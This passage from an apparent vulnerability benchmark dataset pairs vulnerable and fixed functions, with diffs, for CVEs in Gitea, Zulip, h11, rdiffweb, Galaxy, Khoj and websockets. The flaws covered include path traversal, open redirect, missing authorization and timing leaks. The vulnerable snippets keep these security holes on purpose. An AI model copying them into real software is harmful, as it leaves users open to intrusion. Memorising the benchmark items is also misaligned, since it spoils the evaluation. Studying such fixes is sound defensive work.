\"change_handR_color\":\n value = int(value)\n webinterface.learning.hand_colorR += value\n webinterface.learning.hand_colorR = clamp(webinterface.learning.hand_colorR, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorR\", webinterface.learning.hand_colorR)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_learning_loop\":\n value = int(value == 'true')\n webinterface.learning.is_loop_active = value\n webinterface.usersettings.change_setting_value(\"is_loop_active\", webinterface.learning.is_loop_active)\n\n return jsonify(success=True)\n\n\n return jsonify(success=True)"}], "vul_patch": "--- a/webinterface/views_api.py\n+++ b/webinterface/views_api.py\n@@ -823,7 +823,7 @@\n return send_file(\"../Songs/\" + value.replace(\".mid\", \"\") + \".zip\", mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \"\") + \".zip\", as_attachment=True)\n else:\n- return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n+ return send_file(safe_join(\"../Songs/\" + value), mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n \n if setting_name == \"download_sheet_music\":\n@@ -838,7 +838,7 @@\n i += 1\n webinterface.learning.convert_midi_to_abc(value)\n try:\n- return send_file(\"../Songs/\" + value.replace(\".mid\", \".abc\"), mimetype='application/x-csv',\n+ return send_file(safe_join(\"../Songs/\", value.replace(\".mid\", \".abc\")), mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \".abc\"), as_attachment=True)\n except:\n print(\"Converting failed\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1058", "cve_description": "Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/go-gitea/gitea", "patch_url": ["https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48"], "programing_language": "Go", "vul_func": [{"id": "vul_go_250_1", "commit": "6fc73a84332643ffbd431f6e7fcb16942c505c04", "file_path": "modules/context/context.go", "start_line": 178, "end_line": 194, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "fix_func": [{"id": "fix_go_250_1", "commit": "e3d8e92bdc67562783de9a76b5b7842b68daeb48", "file_path": "modules/context/context.go", "start_line": 178, "end_line": 200, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "vul_patch": "--- a/modules/context/context.go\n+++ b/modules/context/context.go\n@@ -1,6 +1,12 @@\n func (ctx *Context) RedirectToFirst(location ...string) {\n \tfor _, loc := range location {\n \t\tif len(loc) == 0 {\n+\t\t\tcontinue\n+\t\t}\n+\n+\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n+\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n+\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n \t\t\tcontinue\n \t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-56136", "cve_description": "Zulip server provides an open-source team chat that helps teams stay productive and focused. Zulip Server 7.0 and above are vulnerable to an information disclose attack, where, if a Zulip server is hosting multiple organizations, an unauthenticated user can make a request and determine if an email address is in use by a user. Zulip Server 9.4 resolves the issue, as does the `main` branch of Zulip Server. Users are advised to upgrade. There are no known workarounds for this issue.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/zulip/zulip", "patch_url": ["https://github.com/zulip/zulip/commit/c6334a765b1e6d71760e4a3b32ae5b8367f2ed4d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_344_1", "commit": "ff5512e5a93ac3ecf327288b3f37e032de0aaf81", "file_path": "zerver/views/auth.py", "start_line": 989, "end_line": 1001, "snippet": "def get_api_key_fetch_authenticate_failure(return_data: dict[str, bool]) -> JsonableError:\n if return_data.get(\"inactive_user\"):\n return UserDeactivatedError()\n if return_data.get(\"inactive_realm\"):\n return RealmDeactivatedError()\n if return_data.get(\"password_auth_disabled\"):\n return PasswordAuthDisabledError()\n if return_data.get(\"password_reset_needed\"):\n return PasswordResetRequiredError()\n if return_data.get(\"invalid_subdomain\"):\n raise InvalidSubdomainError\n\n return AuthenticationFailedError()"}], "fix_func": [{"id": "fix_py_344_1", "commit": "c6334a765b1e6d71760e4a3b32ae5b8367f2ed4d", "file_path": "zerver/views/auth.py", "start_line": 989, "end_line": 1004, "snippet": "def get_api_key_fetch_authenticate_failure(return_data: dict[str, bool]) -> JsonableError:\n if return_data.get(\"inactive_user\"):\n return UserDeactivatedError()\n if return_data.get(\"inactive_realm\"):\n return RealmDeactivatedError()\n if return_data.get(\"password_auth_disabled\"):\n return PasswordAuthDisabledError()\n if return_data.get(\"password_reset_needed\"):\n return PasswordResetRequiredError()\n if return_data.get(\"invalid_subdomain\"):\n # We must not report invalid_subdomain here; that value is intended only for informing server logs,\n # and should never be exposed to end users, since it would leak whether there exists\n # an account in a different organization with the same email address.\n return AuthenticationFailedError()\n\n return AuthenticationFailedError()"}], "vul_patch": "--- a/zerver/views/auth.py\n+++ b/zerver/views/auth.py\n@@ -8,6 +8,9 @@\n if return_data.get(\"password_reset_needed\"):\n return PasswordResetRequiredError()\n if return_data.get(\"invalid_subdomain\"):\n- raise InvalidSubdomainError\n+ # We must not report invalid_subdomain here; that value is intended only for informing server logs,\n+ # and should never be exposed to end users, since it would leak whether there exists\n+ # an account in a different organization with the same email address.\n+ return AuthenticationFailedError()\n \n return AuthenticationFailedError()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-43859", "cve_description": "h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.", "cwe_info": {"CWE-444": {"name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", "description": "The product acts as an intermediary HTTP agent\n (such as a proxy or firewall) in the data flow between two\n entities such as a client and server, but it does not\n interpret malformed HTTP requests or responses in ways that\n are consistent with how the messages will be processed by\n those entities that are at the ultimate destination."}}, "repo": "https://github.com/python-hyper/h11", "patch_url": ["https://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed"], "programing_language": "Python", "vul_func": [{"id": "vul_py_68_1", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 149, "end_line": 154, "snippet": " def __init__(self) -> None:\n self._bytes_in_chunk = 0\n # After reading a chunk, we have to throw away the trailing \\r\\n.\n # This tracks the bytes that we need to match and throw away.\n self._bytes_to_discard = b\"\"\n self._reading_trailer = False"}, {"id": "vul_py_68_2", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 156, "end_line": 204, "snippet": " def __call__(self, buf: ReceiveBuffer) -> Union[Data, EndOfMessage, None]:\n if self._reading_trailer:\n lines = buf.maybe_extract_lines()\n if lines is None:\n return None\n return EndOfMessage(headers=list(_decode_header_lines(lines)))\n if self._bytes_to_discard:\n data = buf.maybe_extract_at_most(len(self._bytes_to_discard))\n if data is None:\n return None\n if data != self._bytes_to_discard[:len(data)]:\n raise LocalProtocolError(\n f\"malformed chunk footer: {data!r} (expected {self._bytes_to_discard!r})\"\n )\n self._bytes_to_discard = self._bytes_to_discard[len(data):]\n if self._bytes_to_discard:\n return None\n # else, fall through and read some more\n assert self._bytes_to_discard == b\"\"\n if self._bytes_in_chunk == 0:\n # We need to refill our chunk count\n chunk_header = buf.maybe_extract_next_line()\n if chunk_header is None:\n return None\n matches = validate(\n chunk_header_re,\n chunk_header,\n \"illegal chunk header: {!r}\",\n chunk_header,\n )\n # XX FIXME: we discard chunk extensions. Does anyone care?\n self._bytes_in_chunk = int(matches[\"chunk_size\"], base=16)\n if self._bytes_in_chunk == 0:\n self._reading_trailer = True\n return self(buf)\n chunk_start = True\n else:\n chunk_start = False\n assert self._bytes_in_chunk > 0\n data = buf.maybe_extract_at_most(self._bytes_in_chunk)\n if data is None:\n return None\n self._bytes_in_chunk -= len(data)\n if self._bytes_in_chunk == 0:\n self._bytes_to_discard = b\"\\r\\n\"\n chunk_end = True\n else:\n chunk_end = False\n return Data(data=data, chunk_start=chunk_start, chunk_end=chunk_end)"}], "fix_func": [{"id": "fix_py_68_1", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 149, "end_line": 154, "snippet": " def __init__(self) -> None:\n self._bytes_in_chunk = 0\n # After reading a chunk, we have to throw away the trailing \\r\\n.\n # This tracks the bytes that we need to match and throw away.\n self._bytes_to_discard = b\"\"\n self._reading_trailer = False"}, {"id": "fix_py_68_2", "commit": "114803a29ce50116dc47951c690ad4892b1a36ed", "file_path": "h11/_readers.py", "start_line": 156, "end_line": 204, "snippet": " def __call__(self, buf: ReceiveBuffer) -> Union[Data, EndOfMessage, None]:\n if self._reading_trailer:\n lines = buf.maybe_extract_lines()\n if lines is None:\n return None\n return EndOfMessage(headers=list(_decode_header_lines(lines)))\n if self._bytes_to_discard:\n data = buf.maybe_extract_at_most(len(self._bytes_to_discard))\n if data is None:\n return None\n if data != self._bytes_to_discard[:len(data)]:\n raise LocalProtocolError(\n f\"malformed chunk footer: {data!r} (expected {self._bytes_to_discard!r})\"\n )\n self._bytes_to_discard = self._bytes_to_discard[len(data):]\n if self._bytes_to_discard:\n return None\n # else, fall through and read some more\n assert self._bytes_to_discard == b\"\"\n if self._bytes_in_chunk == 0:\n # We need to refill our chunk count\n chunk_header = buf.maybe_extract_next_line()\n if chunk_header is None:\n return None\n matches = validate(\n chunk_header_re,\n chunk_header,\n \"illegal chunk header: {!r}\",\n chunk_header,\n )\n # XX FIXME: we discard chunk extensions. Does anyone care?\n self._bytes_in_chunk = int(matches[\"chunk_size\"], base=16)\n if self._bytes_in_chunk == 0:\n self._reading_trailer = True\n return self(buf)\n chunk_start = True\n else:\n chunk_start = False\n assert self._bytes_in_chunk > 0\n data = buf.maybe_extract_at_most(self._bytes_in_chunk)\n if data is None:\n return None\n self._bytes_in_chunk -= len(data)\n if self._bytes_in_chunk == 0:\n self._bytes_to_discard = b\"\\r\\n\"\n chunk_end = True\n else:\n chunk_end = False\n return Data(data=data, chunk_start=chunk_start, chunk_end=chunk_end)"}], "vul_patch": "\n\n\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-43859:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/h11\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2025-43859/bin/python -m pytest h11/tests/test_io.py -k \"t_body_reader or test_ChunkedReader or test_ContentLengthWriter\"\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-43859:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/h11\ngit apply --whitespace=nowarn /workspace/test.patch\n/workspace/PoC_env/CVE-2025-43859/bin/python -m pytest h11/tests/test_io.py -k \"not test_ChunkedReader\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-4720", "cve_description": "Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.5.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/6afaae56a29536f0118b3380d296c416aa6d078d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_147_1", "commit": "b0c1422", "file_path": "rdiffweb/core/notification.py", "start_line": 66, "end_line": 78, "snippet": " def access_token_added(self, userobj, name):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # Send a mail notification\n body = self.app.templates.compile_template(\n \"access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"A new access token has been created\"), message=body)"}, {"id": "vul_py_147_2", "commit": "b0c1422", "file_path": "rdiffweb/core/notification.py", "start_line": 111, "end_line": 123, "snippet": " def user_password_changed(self, userobj):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # If the email attributes was changed, send a mail notification.\n body = self.app.templates.compile_template(\n \"password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"Password changed\"), message=body)"}], "fix_func": [{"id": "fix_py_147_1", "commit": "6afaae5", "file_path": "rdiffweb/core/notification.py", "start_line": 66, "end_line": 78, "snippet": " def access_token_added(self, userobj, name):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # Send a mail notification\n body = self.app.templates.compile_template(\n \"email_access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"A new access token has been created\"), message=body)"}, {"id": "fix_py_147_2", "commit": "6afaae5", "file_path": "rdiffweb/core/notification.py", "start_line": 111, "end_line": 123, "snippet": " def user_password_changed(self, userobj):\n if not self.send_changed:\n return\n\n if not userobj.email:\n logger.info(\"can't sent mail to user [%s] without an email\", userobj.username)\n return\n\n # If the email attributes was changed, send a mail notification.\n body = self.app.templates.compile_template(\n \"email_password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"Password changed\"), message=body)"}], "vul_patch": "--- a/rdiffweb/core/notification.py\n+++ b/rdiffweb/core/notification.py\n@@ -8,6 +8,6 @@\n \n # Send a mail notification\n body = self.app.templates.compile_template(\n- \"access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n+ \"email_access_token_added.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj, 'name': name}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"A new access token has been created\"), message=body)\n\n--- a/rdiffweb/core/notification.py\n+++ b/rdiffweb/core/notification.py\n@@ -8,6 +8,6 @@\n \n # If the email attributes was changed, send a mail notification.\n body = self.app.templates.compile_template(\n- \"password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n+ \"email_password_changed.html\", **{\"header_name\": self.app.cfg.header_name, 'user': userobj}\n )\n self.bus.publish('queue_mail', to=userobj.email, subject=_(\"Password changed\"), message=body)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-23470", "cve_description": "Galaxy is an open-source platform for data analysis. An arbitrary file read exists in Galaxy 22.01 and Galaxy 22.05 due to the switch to Gunicorn, which can be used to read any file accessible to the operating system user under which Galaxy is running. This vulnerability affects Galaxy 22.01 and higher, after the switch to gunicorn, which serve static contents directly. Additionally, the vulnerability is mitigated when using Nginx or Apache to serve /static/* contents, instead of Galaxy's internal middleware. This issue has been patched in commit `e5e6bda4f` and will be included in future releases. Users are advised to manually patch their installations. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/galaxyproject/galaxy", "patch_url": ["https://github.com/galaxyproject/galaxy/commit/e5e6bda4f014f807ca77ee0cf6af777a55918346"], "programing_language": "Python", "vul_func": [{"id": "vul_py_108_1", "commit": "7136d72", "file_path": "lib/galaxy/web/framework/middleware/static.py", "start_line": 17, "end_line": 60, "snippet": " def __call__(self, environ, start_response):\n path_info = environ.get('PATH_INFO', '')\n if not path_info:\n # See if this is a static file hackishly mapped.\n if os.path.exists(self.directory) and os.path.isfile(self.directory):\n app = FileApp(self.directory)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)\n return self.add_slash(environ, start_response)\n if path_info == '/':\n # @@: This should obviously be configurable\n filename = 'index.html'\n else:\n filename = request.path_info_pop(environ)\n\n directory = self.directory\n host = environ.get('HTTP_HOST')\n if self.directory_per_host and host:\n for host_key, host_val in self.directory_per_host.items():\n if host_key in host:\n directory = host_val\n break\n\n full = os.path.join(directory, filename)\n if not os.path.exists(full):\n return self.not_found(environ, start_response)\n if os.path.isdir(full):\n # @@: Cache?\n return self.__class__(full)(environ, start_response)\n if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':\n return self.error_extra_path(environ, start_response)\n if_none_match = environ.get('HTTP_IF_NONE_MATCH')\n if if_none_match:\n mytime = os.stat(full).st_mtime\n if str(mytime) == if_none_match:\n headers: List[Tuple[str, str]] = []\n ETAG.update(headers, mytime)\n start_response('304 Not Modified', headers)\n return [''] # empty body\n app = FileApp(full)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)"}], "fix_func": [{"id": "fix_py_108_1", "commit": "e5e6bda", "file_path": "lib/galaxy/web/framework/middleware/static.py", "start_line": 17, "end_line": 64, "snippet": " def __call__(self, environ, start_response):\n path_info = environ.get('PATH_INFO', '')\n if not path_info:\n # See if this is a static file hackishly mapped.\n if os.path.exists(self.directory) and os.path.isfile(self.directory):\n app = FileApp(self.directory)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)\n return self.add_slash(environ, start_response)\n if path_info == '/':\n # @@: This should obviously be configurable\n filename = 'index.html'\n else:\n filename = request.path_info_pop(environ)\n\n directory = self.directory\n host = environ.get('HTTP_HOST')\n if self.directory_per_host and host:\n for host_key, host_val in self.directory_per_host.items():\n if host_key in host:\n directory = host_val\n break\n\n full = self.normpath(os.path.join(directory, filename))\n if not full.startswith(directory):\n # Out of bounds\n return self.not_found(environ, start_response)\n\n if not os.path.exists(full):\n return self.not_found(environ, start_response)\n if os.path.isdir(full):\n # @@: Cache?\n return self.__class__(full)(environ, start_response)\n if environ.get('PATH_INFO') and environ.get('PATH_INFO') != '/':\n return self.error_extra_path(environ, start_response)\n if_none_match = environ.get('HTTP_IF_NONE_MATCH')\n if if_none_match:\n mytime = os.stat(full).st_mtime\n if str(mytime) == if_none_match:\n headers: List[Tuple[str, str]] = []\n ETAG.update(headers, mytime)\n start_response('304 Not Modified', headers)\n return [''] # empty body\n app = FileApp(full)\n if self.cache_seconds:\n app.cache_control(max_age=int(self.cache_seconds))\n return app(environ, start_response)"}], "vul_patch": "--- a/lib/galaxy/web/framework/middleware/static.py\n+++ b/lib/galaxy/web/framework/middleware/static.py\n@@ -22,7 +22,11 @@\n directory = host_val\n break\n \n- full = os.path.join(directory, filename)\n+ full = self.normpath(os.path.join(directory, filename))\n+ if not full.startswith(directory):\n+ # Out of bounds\n+ return self.not_found(environ, start_response)\n+\n if not os.path.exists(full):\n return self.not_found(environ, start_response)\n if os.path.isdir(full):\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-52294", "cve_description": "Khoj is a self-hostable artificial intelligence app. Prior to version 1.29.10, an Insecure Direct Object Reference (IDOR) vulnerability in the update_subscription endpoint allows any authenticated user to manipulate other users' Stripe subscriptions by simply modifying the email parameter in the request. The vulnerability exists in the subscription endpoint at `/api/subscription`. The endpoint uses an email parameter as a direct reference to user subscriptions without verifying object ownership. While authentication is required, there is no authorization check to verify if the authenticated user owns the referenced subscription. The issue was fixed in version 1.29.10. Support for arbitrarily presenting an email for update has been deprecated.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/khoj-ai/khoj", "patch_url": ["https://github.com/khoj-ai/khoj/commit/47d3c8c23597900af708bdc60aced3ae5d2064c1"], "programing_language": "Python", "vul_func": [{"id": "vul_py_286_1", "commit": "d702710", "file_path": "src/khoj/routers/api_subscription.py", "start_line": 97, "end_line": 120, "snippet": "async def update_subscription(request: Request, email: str, operation: str):\n # Retrieve the customer's details\n customers = stripe.Customer.list(email=email).auto_paging_iter()\n customer = next(customers, None)\n if customer is None:\n return {\"success\": False, \"message\": \"Customer not found\"}\n\n if operation == \"cancel\":\n customer_id = customer.id\n for subscription in stripe.Subscription.list(customer=customer_id):\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=True)\n return {\"success\": True}\n\n elif operation == \"resubscribe\":\n subscriptions = stripe.Subscription.list(customer=customer.id).auto_paging_iter()\n # Find the subscription that is set to cancel at the end of the period\n for subscription in subscriptions:\n if subscription.cancel_at_period_end:\n # Update the subscription to not cancel at the end of the period\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=False)\n return {\"success\": True}\n return {\"success\": False, \"message\": \"No subscription found that is set to cancel\"}\n\n return {\"success\": False, \"message\": \"Invalid operation\"}"}], "fix_func": [{"id": "fix_py_286_1", "commit": "47d3c8c23597900af708bdc60aced3ae5d2064c1", "file_path": "src/khoj/routers/api_subscription.py", "start_line": 97, "end_line": 121, "snippet": "async def update_subscription(request: Request, operation: str):\n # Retrieve the customer's details\n email = request.user.object.email\n customers = stripe.Customer.list(email=email).auto_paging_iter()\n customer = next(customers, None)\n if customer is None:\n return {\"success\": False, \"message\": \"Customer not found\"}\n\n if operation == \"cancel\":\n customer_id = customer.id\n for subscription in stripe.Subscription.list(customer=customer_id):\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=True)\n return {\"success\": True}\n\n elif operation == \"resubscribe\":\n subscriptions = stripe.Subscription.list(customer=customer.id).auto_paging_iter()\n # Find the subscription that is set to cancel at the end of the period\n for subscription in subscriptions:\n if subscription.cancel_at_period_end:\n # Update the subscription to not cancel at the end of the period\n stripe.Subscription.modify(subscription.id, cancel_at_period_end=False)\n return {\"success\": True}\n return {\"success\": False, \"message\": \"No subscription found that is set to cancel\"}\n\n return {\"success\": False, \"message\": \"Invalid operation\"}"}], "vul_patch": "--- a/src/khoj/routers/api_subscription.py\n+++ b/src/khoj/routers/api_subscription.py\n@@ -1,5 +1,6 @@\n-async def update_subscription(request: Request, email: str, operation: str):\n+async def update_subscription(request: Request, operation: str):\n # Retrieve the customer's details\n+ email = request.user.object.email\n customers = stripe.Customer.list(email=email).auto_paging_iter()\n customer = next(customers, None)\n if customer is None:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-33880", "cve_description": "The aaugustin websockets library before 9.1 for Python has an Observable Timing Discrepancy on servers when HTTP Basic Authentication is enabled with basic_auth_protocol_factory(credentials=...). An attacker may be able to guess a password via a timing attack.", "cwe_info": {"CWE-203": {"name": "Observable Discrepancy", "description": "The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not."}}, "repo": "https://github.com/aaugustin/websockets", "patch_url": ["https://github.com/aaugustin/websockets/commit/547a26b685d08cac0aa64e5e65f7867ac0ea9bc0"], "programing_language": "Python", "vul_func": [{"id": "vul_py_418_1", "commit": "a14226a", "file_path": "src/websockets/legacy/auth.py", "start_line": 86, "end_line": 162, "snippet": "def basic_auth_protocol_factory(\n realm: str,\n credentials: Optional[Union[Credentials, Iterable[Credentials]]] = None,\n check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None,\n create_protocol: Optional[Callable[[Any], BasicAuthWebSocketServerProtocol]] = None,\n) -> Callable[[Any], BasicAuthWebSocketServerProtocol]:\n \"\"\"\n Protocol factory that enforces HTTP Basic Auth.\n\n ``basic_auth_protocol_factory`` is designed to integrate with\n :func:`~websockets.legacy.server.serve` like this::\n\n websockets.serve(\n ...,\n create_protocol=websockets.basic_auth_protocol_factory(\n realm=\"my dev server\",\n credentials=(\"hello\", \"iloveyou\"),\n )\n )\n\n ``realm`` indicates the scope of protection. It should contain only ASCII\n characters because the encoding of non-ASCII characters is undefined.\n Refer to section 2.2 of :rfc:`7235` for details.\n\n ``credentials`` defines hard coded authorized credentials. It can be a\n ``(username, password)`` pair or a list of such pairs.\n\n ``check_credentials`` defines a coroutine that checks whether credentials\n are authorized. This coroutine receives ``username`` and ``password``\n arguments and returns a :class:`bool`.\n\n One of ``credentials`` or ``check_credentials`` must be provided but not\n both.\n\n By default, ``basic_auth_protocol_factory`` creates a factory for building\n :class:`BasicAuthWebSocketServerProtocol` instances. You can override this\n with the ``create_protocol`` parameter.\n\n :param realm: scope of protection\n :param credentials: hard coded credentials\n :param check_credentials: coroutine that verifies credentials\n :raises TypeError: if the credentials argument has the wrong type\n\n \"\"\"\n if (credentials is None) == (check_credentials is None):\n raise TypeError(\"provide either credentials or check_credentials\")\n\n if credentials is not None:\n if is_credentials(credentials):\n\n async def check_credentials(username: str, password: str) -> bool:\n return (username, password) == credentials\n\n elif isinstance(credentials, Iterable):\n credentials_list = list(credentials)\n if all(is_credentials(item) for item in credentials_list):\n credentials_dict = dict(credentials_list)\n\n async def check_credentials(username: str, password: str) -> bool:\n return credentials_dict.get(username) == password\n\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n\n if create_protocol is None:\n # Not sure why mypy cannot figure this out.\n create_protocol = cast(\n Callable[[Any], BasicAuthWebSocketServerProtocol],\n BasicAuthWebSocketServerProtocol,\n )\n\n return functools.partial(\n create_protocol, realm=realm, check_credentials=check_credentials\n )"}], "fix_func": [{"id": "fix_py_418_1", "commit": "547a26b685d08cac0aa64e5e65f7867ac0ea9bc0", "file_path": "src/websockets/legacy/auth.py", "start_line": 87, "end_line": 164, "snippet": "def basic_auth_protocol_factory(\n realm: str,\n credentials: Optional[Union[Credentials, Iterable[Credentials]]] = None,\n check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None,\n create_protocol: Optional[Callable[[Any], BasicAuthWebSocketServerProtocol]] = None,\n) -> Callable[[Any], BasicAuthWebSocketServerProtocol]:\n \"\"\"\n Protocol factory that enforces HTTP Basic Auth.\n\n ``basic_auth_protocol_factory`` is designed to integrate with\n :func:`~websockets.legacy.server.serve` like this::\n\n websockets.serve(\n ...,\n create_protocol=websockets.basic_auth_protocol_factory(\n realm=\"my dev server\",\n credentials=(\"hello\", \"iloveyou\"),\n )\n )\n\n ``realm`` indicates the scope of protection. It should contain only ASCII\n characters because the encoding of non-ASCII characters is undefined.\n Refer to section 2.2 of :rfc:`7235` for details.\n\n ``credentials`` defines hard coded authorized credentials. It can be a\n ``(username, password)`` pair or a list of such pairs.\n\n ``check_credentials`` defines a coroutine that checks whether credentials\n are authorized. This coroutine receives ``username`` and ``password``\n arguments and returns a :class:`bool`.\n\n One of ``credentials`` or ``check_credentials`` must be provided but not\n both.\n\n By default, ``basic_auth_protocol_factory`` creates a factory for building\n :class:`BasicAuthWebSocketServerProtocol` instances. You can override this\n with the ``create_protocol`` parameter.\n\n :param realm: scope of protection\n :param credentials: hard coded credentials\n :param check_credentials: coroutine that verifies credentials\n :raises TypeError: if the credentials argument has the wrong type\n\n \"\"\"\n if (credentials is None) == (check_credentials is None):\n raise TypeError(\"provide either credentials or check_credentials\")\n\n if credentials is not None:\n if is_credentials(credentials):\n credentials_list = [cast(Credentials, credentials)]\n elif isinstance(credentials, Iterable):\n credentials_list = list(credentials)\n if not all(is_credentials(item) for item in credentials_list):\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n\n credentials_dict = dict(credentials_list)\n\n async def check_credentials(username: str, password: str) -> bool:\n try:\n expected_password = credentials_dict[username]\n except KeyError:\n return False\n return hmac.compare_digest(expected_password, password)\n\n if create_protocol is None:\n # Not sure why mypy cannot figure this out.\n create_protocol = cast(\n Callable[[Any], 